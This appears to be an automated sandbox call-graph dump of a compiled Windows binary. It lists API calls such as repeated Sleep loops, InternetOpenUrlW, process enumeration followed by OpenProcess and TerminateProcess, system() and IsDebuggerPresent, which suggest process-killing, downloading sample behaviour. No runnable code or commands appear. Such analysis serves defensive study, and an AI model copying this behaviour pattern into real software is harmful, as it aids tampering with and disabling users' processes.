5257 207df0 2 API calls 5256->5257 5258 2060bc Sleep 5257->5258 5259 207e40 11 API calls 5258->5259 5260 2060d0 5259->5260 5261 207e40 11 API calls 5260->5261 5262 2060e4 5261->5262 5263 202240 92 API calls 5262->5263 5264 2060f9 5263->5264 5265 207df0 2 API calls 5264->5265 5266 206104 5265->5266 5267 207df0 2 API calls 5266->5267 5268 206113 Sleep 5267->5268 5269 207e40 11 API calls 5268->5269 5270 206127 5269->5270 5271 207e40 11 API calls 5270->5271 5272 20613b 5271->5272 5273 202240 92 API calls 5272->5273 5274 206150 5273->5274 5275 207df0 2 API calls 5274->5275 5276 20615b 5275->5276 5277 207df0 2 API calls 5276->5277 5278 20616a Sleep 5277->5278 5279 207e40 11 API calls 5278->5279 5280 20617e 5279->5280 5281 207e40 11 API calls 5280->5281 5282 206192 5281->5282 5283 202240 92 API calls 5282->5283 5284 2061a7 5283->5284 5285 207df0 2 API calls 5284->5285 5286 2061b2 5285->5286 5287 207df0 2 API calls 5286->5287 5288 2061c1 Sleep 5287->5288 5289 207e40 11 API calls 5288->5289 5290 2061d5 5289->5290 5291 207e40 11 API calls 5290->5291 5292 2061e9 5291->5292 5293 202240 92 API calls 5292->5293 5294 2061fe 5293->5294 5295 207df0 2 API calls 5294->5295 5296 206209 5295->5296 5297 207df0 2 API calls 5296->5297 5298 206218 Sleep 5297->5298 5299 207e40 11 API calls 5298->5299 5300 20622c 5299->5300 5301 207e40 11 API calls 5300->5301 5302 206240 5301->5302 5303 202240 92 API calls 5302->5303 5304 206255 5303->5304 5305 207df0 2 API calls 5304->5305 5306 206260 5305->5306 5307 207df0 2 API calls 5306->5307 5308 20626f Sleep 5307->5308 5309 207e40 11 API calls 5308->5309 5310 206283 5309->5310 5311 207e40 11 API calls 5310->5311 5312 206297 5311->5312 5313 202240 92 API calls 5312->5313 5314 2062ac 5313->5314 5315 207df0 2 API calls 5314->5315 5316 2062b7 5315->5316 5317 207df0 2 API calls 5316->5317 5318 2062c6 Sleep 5317->5318 5319 207e40 11 API calls 5318->5319 5320 2062da 5319->5320 5321 207e40 11 API calls 5320->5321 5322 2062ee 5321->5322 5323 202240 92 API calls 5322->5323 5324 206303 5323->5324 5325 207df0 2 API calls 5324->5325 5326 20630e 5325->5326 5327 207df0 2 API calls 5326->5327 5328 20631d Sleep 5327->5328 5329 207e40 11 API calls 5328->5329 5330 206331 5329->5330 5331 207e40 11 API calls 5330->5331 5332 206345 5331->5332 5333 202240 92 API calls 5332->5333 5334 20635a 5333->5334 5335 207df0 2 API calls 5334->5335 5336 206365 5335->5336 5337 207df0 2 API calls 5336->5337 5338 206374 Sleep 5337->5338 5339 207e40 11 API calls 5338->5339 5340 206388 5339->5340 5341 207e40 11 API calls 5340->5341 5342 20639c 5341->5342 5343 202240 92 API calls 5342->5343 5344 2063b1 5343->5344 5345 207df0 2 API calls 5344->5345 5346 2063bc 5345->5346 5347 207df0 2 API calls 5346->5347 5348 2063cb Sleep 5347->5348 5349 207e40 11 API calls 5348->5349 5350 2063df 5349->5350 5351 207e40 11 API calls 5350->5351 5352 2063f3 5351->5352 5353 202240 92 API calls 5352->5353 5354 206408 5353->5354 5355 207df0 2 API calls 5354->5355 5356 206413 5355->5356 5357 207df0 2 API calls 5356->5357 5358 206422 Sleep 5357->5358 5359 207e40 11 API calls 5358->5359 5360 206436 5359->5360 5361 207e40 11 API calls 5360->5361 5362 20644a 5361->5362 5363 202240 92 API calls 5362->5363 5364 20645f 5363->5364 5365 207df0 2 API calls 5364->5365 5366 20646a 5365->5366 5367 207df0 2 API calls 5366->5367 5368 206479 Sleep 5367->5368 5369 207e40 11 API calls 5368->5369 5370 20648d 5369->5370 5371 207e40 11 API calls 5370->5371 5372 2064a1 5371->5372 5373 202240 92 API calls 5372->5373 5374 2064b6 5373->5374 5375 207df0 2 API calls 5374->5375 5376 2064c1 5375->5376 5377 207df0 2 API calls 5376->5377 5378 2064d0 Sleep 5377->5378 5379 207e40 11 API calls 5378->5379 5380 2064e4 5379->5380 5381 207e40 11 API calls 5380->5381 5382 2064f8 5381->5382 5383 202240 92 API calls 5382->5383 5384 20650d 5383->5384 5385 207df0 2 API calls 5384->5385 5386 206518 5385->5386 5387 207df0 2 API calls 5386->5387 5388 206527 Sleep 5387->5388 5389 207e40 11 API calls 5388->5389 5390 20653b 5389->5390 5391 207e40 11 API calls 5390->5391 5392 20654f 5391->5392 5393 202240 92 API calls 5392->5393 5394 206564 5393->5394 5395 207df0 2 API calls 5394->5395 5396 20656f 5395->5396 5397 207df0 2 API calls 5396->5397 5398 20657e Sleep 5397->5398 5399 207e40 11 API calls 5398->5399 5400 206592 5399->5400 5401 207e40 11 API calls 5400->5401 5402 2065a6 5401->5402 5403 202240 92 API calls 5402->5403 5404 2065bb 5403->5404 5405 207df0 2 API calls 5404->5405 5406 2065c6 5405->5406 5407 207df0 2 API calls 5406->5407 5408 2065d5 Sleep 5407->5408 5409 207e40 11 API calls 5408->5409 5410 2065e9 5409->5410 5411 207e40 11 API calls 5410->5411 5412 2065fd 5411->5412 5413 202240 92 API calls 5412->5413 5414 206612 5413->5414 5415 207df0 2 API calls 5414->5415 5416 20661d 5415->5416 5417 207df0 2 API calls 5416->5417 5418 20662c Sleep 5417->5418 5419 207e40 11 API calls 5418->5419 5420 206640 5419->5420 5421 207e40 11 API calls 5420->5421 5422 206654 5421->5422 5423 202240 92 API calls 5422->5423 5424 206669 5423->5424 5425 207df0 2 API calls 5424->5425 5426 206674 5425->5426 5427 207df0 2 API calls 5426->5427 5428 206683 Sleep 5427->5428 5429 207e40 11 API calls 5428->5429 5430 206697 5429->5430 5431 207e40 11 API calls 5430->5431 5432 2066ab 5431->5432 5433 202240 92 API calls 5432->5433 5434 2066c0 5433->5434 5435 207df0 2 API calls 5434->5435 5436 2066cb 5435->5436 5437 207df0 2 API calls 5436->5437 5438 2066da Sleep 5437->5438 5439 207e40 11 API calls 5438->5439 5440 2066ee 5439->5440 5441 207e40 11 API calls 5440->5441 5442 206702 5441->5442 5443 202240 92 API calls 5442->5443 5444 206717 5443->5444 5445 207df0 2 API calls 5444->5445 5446 206722 5445->5446 5447 207df0 2 API calls 5446->5447 5448 206731 Sleep 5447->5448 5449 207e40 11 API calls 5448->5449 5450 206745 5449->5450 5451 207e40 11 API calls 5450->5451 5452 206759 5451->5452 5453 202240 92 API calls 5452->5453 5454 20676e 5453->5454 5455 207df0 2 API calls 5454->5455 5456 206779 5455->5456 5457 207df0 2 API calls 5456->5457 5458 206788 Sleep 5457->5458 5459 207e40 11 API calls 5458->5459 5460 20679c 5459->5460 5461 207e40 11 API calls 5460->5461 5462 2067b0 5461->5462 5463 202240 92 API calls 5462->5463 5464 2067c5 5463->5464 5465 207df0 2 API calls 5464->5465 5466 2067d0 5465->5466 5467 207df0 2 API calls 5466->5467 5468 2067df Sleep 5467->5468 5469 207e40 11 API calls 5468->5469 5470 2067f3 5469->5470 5471 207e40 11 API calls 5470->5471 5472 206807 5471->5472 5473 202240 92 API calls 5472->5473 5474 20681c 5473->5474 5475 207df0 2 API calls 5474->5475 5476 206827 5475->5476 5477 207df0 2 API calls 5476->5477 5478 206836 Sleep 5477->5478 5479 207e40 11 API calls 5478->5479 5480 20684a 5479->5480 5481 207e40 11 API calls 5480->5481 5482 20685e 5481->5482 5483 202240 92 API calls 5482->5483 5484 206873 5483->5484 5485 207df0 2 API calls 5484->5485 5486 20687e 5485->5486 5487 207df0 2 API calls 5486->5487 5488 20688d Sleep 5487->5488 5489 207e40 11 API calls 5488->5489 5490 2068a1 5489->5490 5491 207e40 11 API calls 5490->5491 5492 2068b5 5491->5492 5493 202240 92 API calls 5492->5493 5494 2068ca 5493->5494 5495 207df0 2 API calls 5494->5495 5496 2068d5 5495->5496 5497 207df0 2 API calls 5496->5497 5498 2068e4 Sleep 5497->5498 5499 206910 5498->5499 5501 207be0 11 API calls 5499->5501 5772 207be0 5499->5772 5502 206949 5501->5502 5503 207be0 11 API calls 5502->5503 5504 20695d 5503->5504 5505 207be0 11 API calls 5504->5505 5506 206971 5505->5506 5507 207be0 11 API calls 5506->5507 5508 206985 5507->5508 5509 207be0 11 API calls 5508->5509 5510 207be0 11 API calls 5508->5510 5509->5508 5511 2069ad 5510->5511 5512 207be0 11 API calls 5511->5512 5513 2069c1 5512->5513 5514 207be0 11 API calls 5513->5514 5515 2069d5 5514->5515 5516 207be0 11 API calls 5515->5516 5517 2069e9 5516->5517 5518 207be0 11 API calls 5517->5518 5519 207be0 11 API calls 5517->5519 5518->5517 5520 206a11 5519->5520 5521 207be0 11 API calls 5520->5521 5522 206a25 5521->5522 5523 207be0 11 API calls 5522->5523 5524 206a39 5523->5524 5525 207be0 11 API calls 5524->5525 5526 206a4d 5525->5526 5527 207be0 11 API calls 5526->5527 5528 207be0 11 API calls 5526->5528 5527->5526 5529 206a75 5528->5529 5530 207be0 11 API calls 5529->5530 5531 206a89 5530->5531 5532 207be0 11 API calls 5531->5532 5533 206a9d 5532->5533 5534 207be0 11 API calls 5533->5534 5535 206ab1 5534->5535 5536 207be0 11 API calls 5535->5536 5537 207be0 11 API calls 5535->5537 5536->5535 5538 206adc 5537->5538 5539 207be0 11 API calls 5538->5539 5540 206af0 5539->5540 5541 207be0 11 API calls 5540->5541 5542 206b04 5541->5542 5543 207be0 11 API calls 5542->5543 5544 206b18 5543->5544 5545 207be0 11 API calls 5544->5545 5546 207be0 11 API calls 5544->5546 5545->5544 5547 206b40 5546->5547 5548 207be0 11 API calls 5547->5548 5549 206b54 5548->5549 5550 207be0 11 API calls 5549->5550 5551 206b68 5550->5551 5552 207be0 11 API calls 5551->5552 5553 206b7c 5552->5553 5554 207be0 11 API calls 5553->5554 5555 207be0 11 API calls 5553->5555 5554->5553 5556 206ba4 5555->5556 5557 207be0 11 API calls 5556->5557 5558 206bb8 5557->5558 5559 207be0 11 API calls 5558->5559 5560 206bcc 5559->5560 5561 207be0 11 API calls 5560->5561 5562 206be0 5561->5562 5563 207be0 11 API calls 5562->5563 5564 207be0 11 API calls 5562->5564 5563->5562 5565 206c08 5564->5565 5566 207be0 11 API calls 5565->5566 5567 206c1c 5566->5567 5568 206e2c 5567->5568 5577 206c9d 5567->5577 5585 206c55 5567->5585 5804 208d00 ?_Xlength_error@std@@YAXPBD 5568->5804 5570 206e31 5805 201e40 5570->5805 5571 206c8e 5576 209759 std::_Facet_Register 5 API calls 5571->5576 5572 206d17 5589 206e02 5572->5589 5728 201f90 CreateToolhelp32Snapshot 5572->5728 5573 206e08 Sleep 5744 206e40 5573->5744 5574 206c6e 5574->4127 5574->5572 5579 209759 std::_Facet_Register 5 API calls 5574->5579 5581 206c7f 5574->5581 5588 206dc5 5574->5588 5576->5581 5591 206cf7 5577->5591 5789 209100 5577->5789 5579->5574 5580 206e36 5581->5571 5581->5577 5585->5570 5585->5574 5585->5581 5586 206d58 OpenProcess 5585->5586 5586->5585 5587 206d6a TerminateProcess CloseHandle 5586->5587 5587->5585 5590 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5588->5590 5589->5573 5590->5591 5591->5572 5591->5573 5593 209ce9 5592->5593 5593->4070 5593->4083 5595 20a13e 5594->5595 5596 20a14a memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5595->5596 5597 20a234 5596->5597 5597->4070 5599 209f68 5598->5599 5599->4089 5601 208570 ?good@ios_base@std@ 5600->5601 5603 2085da 5601->5603 5605 208600 5601->5605 5603->5605 5606 2085eb ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 ?good@ios_base@std@ 5603->5606 5604 208610 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N ?uncaught_exception@std@ 5609 2029ed 5604->5609 5610 20871b ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5604->5610 5605->5604 5608 208666 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J 5605->5608 5611 20863b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 5605->5611 5606->5605 5608->5604 5612 208682 5608->5612 5609->4093 5610->5609 5611->5604 5611->5605 5612->5604 5613 2086ae ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 5612->5613 5613->5604 5613->5612 5615 2021a1 InternetOpenUrlW 5614->5615 5616 202207 GetLastError 5614->5616 5617 2021bc InternetCloseHandle InternetCloseHandle 5615->5617 5618 2021cf GetLastError 5615->5618 5619 208530 9 API calls 5616->5619 5617->4096 5620 208530 9 API calls 5618->5620 5621 202223 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z 5619->5621 5622 2021eb ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z InternetCloseHandle 5620->5622 5621->4096 5622->4096 5624 207e70 5623->5624 5624->5624 5625 207f40 5624->5625 5626 207e85 5624->5626 5808 201ee0 ?_Xlength_error@std@@YAXPBD 5625->5808 5627 207e91 memcpy 5626->5627 5633 207eae 5626->5633 5627->4113 5629 207f45 5631 201e40 Concurrency::cancel_current_task 2 API calls 5629->5631 5630 207ebb 5635 209759 std::_Facet_Register 5 API calls 5630->5635 5636 207f4a 5631->5636 5632 207f05 5634 207ed7 memcpy 5632->5634 5637 209759 std::_Facet_Register 5 API calls 5632->5637 5633->5629 5633->5630 5633->5632 5634->4113 5639 207ece 5635->5639 5637->5634 5639->5634 5640 207eff _invalid_parameter_noinfo_noreturn 5639->5640 5640->5632 5642 208d57 ?good@ios_base@std@ 5641->5642 5644 208d92 5642->5644 5650 208db8 5642->5650 5645 208da3 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 ?good@ios_base@std@ 5644->5645 5644->5650 5645->5650 5647 208e1f ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J 5651 208dc8 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N ?uncaught_exception@std@ 5647->5651 5653 208e12 5647->5653 5648 208ec3 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5649 202d89 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z GetEnvironmentVariableA 5648->5649 5649->4135 5649->4136 5650->5647 5650->5651 5652 208df4 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 5650->5652 5651->5648 5651->5649 5652->5650 5652->5653 5653->5651 5654 208e44 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 5653->5654 5654->5651 5654->5653 5809 201d30 5655->5809 5657 201d57 __stdio_common_vsprintf 5657->4139 5659 207d26 memcpy 5658->5659 5660 207d57 5658->5660 5659->4145 5660->4145 5810 207f50 5662->5810 5664 2028bd 5665 202950 5664->5665 5668 208960 18 API calls 5664->5668 5666 20297b 5665->5666 5669 202975 _invalid_parameter_noinfo_noreturn 5665->5669 5672 202982 5665->5672 5670 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5666->5670 5667 20974b __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 5671 20299e 5667->5671 5668->5664 5669->5666 5670->5672 5673 207d80 5671->5673 5672->5667 5675 207d93 5673->5675 5674 207dd0 5674->4151 5675->5674 5676 207db5 memcpy 5675->5676 5676->4151 5678 207dfb 5677->5678 5682 202e52 system 5677->5682 5680 207e35 _invalid_parameter_noinfo_noreturn 5678->5680 5681 207e16 5678->5681 5679 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5679->5682 5681->5679 5683 202240 memset 5682->5683 5684 2022a1 5683->5684 5685 2022a3 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5683->5685 5684->5685 5862 2083f0 5685->5862 5688 202393 ??7ios_base@std@ 5690 2023da 5688->5690 5698 202413 5688->5698 5689 20237b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 5689->5688 5691 208530 9 API calls 5690->5691 5693 2023ea 5691->5693 5692 20248a ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5692->5698 5695 208d10 9 API calls 5693->5695 5694 2024ad ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5694->5698 5697 202403 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z 5695->5697 5696 2024cb 5890 208f00 5696->5890 5727 202669 5697->5727 5698->5692 5698->5694 5698->5696 5699 2024f0 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5698->5699 5704 202532 ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5698->5704 5871 209570 5698->5871 5699->5698 5702 20268c 5705 20974b __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 5702->5705 5704->5698 5708 2026a4 5705->5708 5706 20255f memset 5917 206ec0 5706->5917 5708->4156 5710 2025a1 5712 208530 9 API calls 5710->5712 5711 2025cf ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J 5713 208310 9 API calls 5711->5713 5715 2025b1 5712->5715 5714 2025f2 5713->5714 5716 2025f6 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 5714->5716 5717 20260e 5714->5717 5718 208d10 9 API calls 5715->5718 5716->5717 5719 208530 9 API calls 5717->5719 5720 2025ca 5718->5720 5721 202623 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z 5719->5721 5720->5721 5722 202770 12 API calls 5721->5722 5723 202636 5722->5723 5724 202662 5723->5724 5725 20265c _invalid_parameter_noinfo_noreturn 5723->5725 5723->5727 5726 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5724->5726 5725->5724 5726->5727 5924 2026b0 5727->5924 5729 20204a Process32FirstW 5728->5729 5730 202028 5728->5730 5731 202066 CloseHandle 5729->5731 5739 202080 5729->5739 5733 208530 9 API calls 5730->5733 5731->5730 5732 207be0 11 API calls 5732->5739 5734 20203d ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z 5733->5734 5735 202160 5734->5735 5736 20974b __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 5735->5736 5737 20217a 5736->5737 5737->5585 5738 202130 Process32NextW 5738->5739 5742 202159 CloseHandle 5738->5742 5739->5732 5739->5738 5740 202153 _invalid_parameter_noinfo_noreturn 5739->5740 5741 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5739->5741 5951 2092a0 5739->5951 5740->5742 5741->5739 5742->5735 5745 206e49 5744->5745 5746 206e21 5744->5746 5971 208880 5745->5971 5746->5499 5749 206e8c 5751 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5749->5751 5750 206eaf _invalid_parameter_noinfo_noreturn 5751->5746 5753 20953b 5752->5753 5756 209425 5752->5756 5976 201ee0 ?_Xlength_error@std@@YAXPBD 5753->5976 5755 209540 5759 201e40 Concurrency::cancel_current_task 2 API calls 5755->5759 5757 209493 5756->5757 5758 20946c 5756->5758 5763 209759 std::_Facet_Register 5 API calls 5757->5763 5764 20947d 5757->5764 5758->5755 5760 209477 5758->5760 5761 209545 5759->5761 5762 209759 std::_Facet_Register 5 API calls 5760->5762 5761->4117 5762->5764 5763->5764 5765 2094c9 memcpy memcpy 5764->5765 5766 20951c memcpy memcpy 5764->5766 5767 209516 _invalid_parameter_noinfo_noreturn 5764->5767 5768 2094ed 5765->5768 5769 2094fd 5765->5769 5766->4117 5767->5766 5768->5767 5768->5769 5770 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5769->5770 5771 209506 5770->5771 5771->4117 5773 207c10 5772->5773 5773->5773 5774 207cfd 5773->5774 5775 207c37 memcpy 5773->5775 5776 207c58 5773->5776 5977 201ee0 ?_Xlength_error@std@@YAXPBD 5774->5977 5775->5499 5779 207cf8 5776->5779 5781 207c9c 5776->5781 5783 207cba 5776->5783 5780 201e40 Concurrency::cancel_current_task 2 API calls 5779->5780 5780->5774 5784 209759 std::_Facet_Register 5 API calls 5781->5784 5782 207ca9 memcpy 5782->5499 5783->5782 5785 209759 std::_Facet_Register 5 API calls 5783->5785 5787 207ca2 5784->5787 5785->5782 5787->5782 5788 207cb4 _invalid_parameter_noinfo_noreturn 5787->5788 5788->5783 5790 20925f 5789->5790 5795 20915d 5789->5795 5791 208880 2 API calls 5790->5791 5792 209269 5791->5792 5794 20974b __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 5792->5794 5793 20928f 5978 201ee0 ?_Xlength_error@std@@YAXPBD 5793->5978 5796 209285 5794->5796 5795->5790 5795->5793 5798 209294 5795->5798 5801 209228 memcpy 5795->5801 5802 209759 5 API calls std::_Facet_Register 5795->5802 5803 209289 _invalid_parameter_noinfo_noreturn 5795->5803 5796->5577 5799 201e40 Concurrency::cancel_current_task 2 API calls 5798->5799 5800 209299 5799->5800 5801->5795 5802->5795 5803->5793 5979 201e20 5805->5979 5807 201e4e _CxxThrowException __std_exception_copy 5807->5580 5809->5657 5811 207f7b 5810->5811 5812 20803a 5811->5812 5817 207f8f 5811->5817 5831 201ee0 ?_Xlength_error@std@@YAXPBD 5812->5831 5813 207f9b 5813->5664 5815 20803f 5816 201e40 Concurrency::cancel_current_task 2 API calls 5815->5816 5819 208044 5816->5819 5817->5813 5817->5815 5820 207fbc 5817->5820 5822 208006 5817->5822 5818 209759 std::_Facet_Register 5 API calls 5823 207fcf 5818->5823 5832 202770 5819->5832 5820->5818 5821 207fd8 memcpy 5821->5664 5822->5821 5825 209759 std::_Facet_Register 5 API calls 5822->5825 5823->5821 5827 208000 _invalid_parameter_noinfo_noreturn 5823->5827 5825->5821 5827->5822 5828 20805e 5829 20806f 5828->5829 5830 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5828->5830 5829->5664 5830->5829 5833 2027c5 5832->5833 5834 2027f1 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 5833->5834 5836 208310 5833->5836 5834->5828 5837 20831a 5836->5837 5838 20835d 5836->5838 5842 208240 5837->5842 5839 20835f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5838->5839 5839->5834 5841 208340 fclose 5841->5839 5843 2082fc 5842->5843 5844 20825d 5842->5844 5845 20974b __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 5843->5845 5844->5843 5846 208267 5844->5846 5847 208309 5845->5847 5848 208274 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD 5846->5848 5849 2082ea 5846->5849 5847->5841 5850 2082b1 5848->5850 5851 208292 5848->5851 5852 20974b __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 5849->5852 5856 2082d3 5850->5856 5857 2082bf fwrite 5850->5857 5851->5850 5853 208297 5851->5853 5854 2082f8 5852->5854 5853->5849 5855 20829c 5853->5855 5854->5841 5858 20974b __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 5855->5858 5859 20974b __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 5856->5859 5857->5849 5857->5856 5860 2082ad 5858->5860 5861 2082e6 5859->5861 5860->5841 5861->5841 5863 2084dc 5862->5863 5864 20842c ?_Fiopen@std@@YAPAU_iobuf@@PBDHH 5862->5864 5866 20974b __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 5863->5866 5864->5863 5865 208443 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ _get_stream_buffer_pointers ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2 5864->5865 5928 208780 ??0_Lockit@std@@QAE@H ??Bid@locale@std@ 5865->5928 5868 202377 5866->5868 5868->5688 5868->5689 5870 2084e5 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5870->5863 5872 2096a6 5871->5872 5873 209598 5871->5873 5949 208d00 ?_Xlength_error@std@@YAXPBD 5872->5949 5875 2095b2 5873->5875 5876 2095f7 5873->5876 5877 2096ab 5875->5877 5878 209759 std::_Facet_Register 5 API calls 5875->5878 5880 209759 std::_Facet_Register 5 API calls 5876->5880 5883 2095c2 5876->5883 5879 201e40 Concurrency::cancel_current_task 2 API calls 5877->5879 5878->5883 5881 2096b0 5879->5881 5880->5883 5882 2096a0 _invalid_parameter_noinfo_noreturn 5882->5872 5883->5882 5884 209630 memcpy memcpy 5883->5884 5885 209621 memcpy 5883->5885 5886 209653 5884->5886 5885->5886 5886->5882 5887 20967f 5886->5887 5888 209676 5886->5888 5887->5698 5889 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5888->5889 5889->5887 5891 2090eb 5890->5891 5892 208f2d 5890->5892 5891->5706 5893 20907f 5892->5893 5894 208f53 5892->5894 5895 2090f4 5892->5895 5896 2090c6 memcpy memcpy 5893->5896 5897 20908a memcpy memcpy memcpy 5893->5897 5899 208f6d 5894->5899 5901 208fbb 5894->5901 5902 208fae 5894->5902 5950 208d00 ?_Xlength_error@std@@YAXPBD 5895->5950 5896->5891 5897->5706 5904 209759 std::_Facet_Register 5 API calls 5899->5904 5900 2090f9 5903 201e40 Concurrency::cancel_current_task 2 API calls 5900->5903 5906 208f7f 5901->5906 5907 209759 std::_Facet_Register 5 API calls 5901->5907 5902->5899 5902->5900 5905 2090fe 5903->5905 5904->5906 5908 208fda memcpy 5906->5908 5909 209079 _invalid_parameter_noinfo_noreturn 5906->5909 5907->5906 5910 208ff4 5908->5910 5911 20900a memcpy memcpy 5908->5911 5909->5893 5910->5911 5912 208ff9 memcpy 5910->5912 5913 20902c 5911->5913 5912->5913 5913->5909 5914 20905b 5913->5914 5915 209052 5913->5915 5914->5706 5916 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5915->5916 5916->5914 5918 206f00 5917->5918 5919 206f02 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5917->5919 5918->5919 5920 2083f0 23 API calls 5919->5920 5921 206f9d 5920->5921 5922 202584 ??7ios_base@std@ 5921->5922 5923 206fa1 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 5921->5923 5922->5710 5922->5711 5923->5922 5925 202705 5924->5925 5926 202731 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UAE ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 5925->5926 5927 208310 9 API calls 5925->5927 5926->5702 5927->5926 5929 2087e7 5928->5929 5930 20884f ??1_Lockit@std@@QAE 5929->5930 5932 2087fb ?_Getgloballocale@locale@std@@CAPAV_Locimp@12 5929->5932 5934 208806 5929->5934 5931 20974b __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 5930->5931 5933 2084ce ?always_noconv@codecvt_base@std@ 5931->5933 5932->5934 5933->5863 5933->5870 5934->5930 5935 208817 ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@ 5934->5935 5936 208876 5935->5936 5937 20882c 5935->5937 5945 201f10 5936->5945 5942 209719 5937->5942 5941 20887b 5943 209759 std::_Facet_Register 5 API calls 5942->5943 5944 20883c 5943->5944 5944->5930 5948 201ef0 5945->5948 5947 201f1e _CxxThrowException __std_exception_copy 5947->5941 5948->5947 5952 2093f2 5951->5952 5953 2092cc 5951->5953 5970 208d00 ?_Xlength_error@std@@YAXPBD 5952->5970 5955 2093ed 5953->5955 5958 209310 5953->5958 5959 209337 5953->5959 5956 201e40 Concurrency::cancel_current_task 2 API calls 5955->5956 5956->5952 5958->5955 5960 209759 std::_Facet_Register 5 API calls 5958->5960 5961 209759 std::_Facet_Register 5 API calls 5959->5961 5962 209321 5959->5962 5960->5962 5961->5962 5963 209375 memcpy memcpy 5962->5963 5964 209366 memcpy 5962->5964 5965 2093e7 _invalid_parameter_noinfo_noreturn 5962->5965 5966 209398 5963->5966 5964->5966 5965->5955 5966->5965 5967 2093c7 5966->5967 5968 2093be 5966->5968 5967->5738 5969 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5968->5969 5969->5967 5972 206e53 5971->5972 5973 20888d 5971->5973 5972->5749 